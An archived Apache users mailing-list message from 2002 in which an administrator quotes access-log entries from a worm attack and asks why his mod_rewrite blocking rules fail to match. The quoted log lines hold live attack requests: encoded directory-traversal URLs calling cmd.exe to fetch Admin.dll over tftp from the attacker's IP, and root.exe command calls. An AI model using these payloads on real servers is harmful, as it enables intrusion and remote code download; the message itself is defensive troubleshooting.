httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Bill -OSX- Jones <sn...@mac.com>
Subject Re: Code Red 2 attack
Date Thu, 28 Feb 2002 23:24:11 GMT
Here's an example -

207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"

... 72 practically identical lines deleted ...

207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET 
/scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"

...

But I still feel warm and snuggly inside  :)

Anyhow, earlier I posted a mod_rewrite question that went by 
somewhat unnoticed, so please allow me to try once more -- then if 
no one responds I will go back into my semi-annual hibernation  :)

I want to test for
RewriteCond %{REQUEST_FILENAME} \.ida.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.com.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.exe.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.dll.+$ [NC]
RewriteRule ^.*$ http://insecurity.org/403.shtml [L]

Which apparently works, but it seems that this typical section of 
the CR2 request:  /..%252f../  as denoted within -
207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"

is somehow causing the match to fail and not match.


		Any thoughts?
_Sx____________________
  ('>    -Sx- IUDICIUM
  //\   Have Computer -
  v_/_    Will Hack...


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message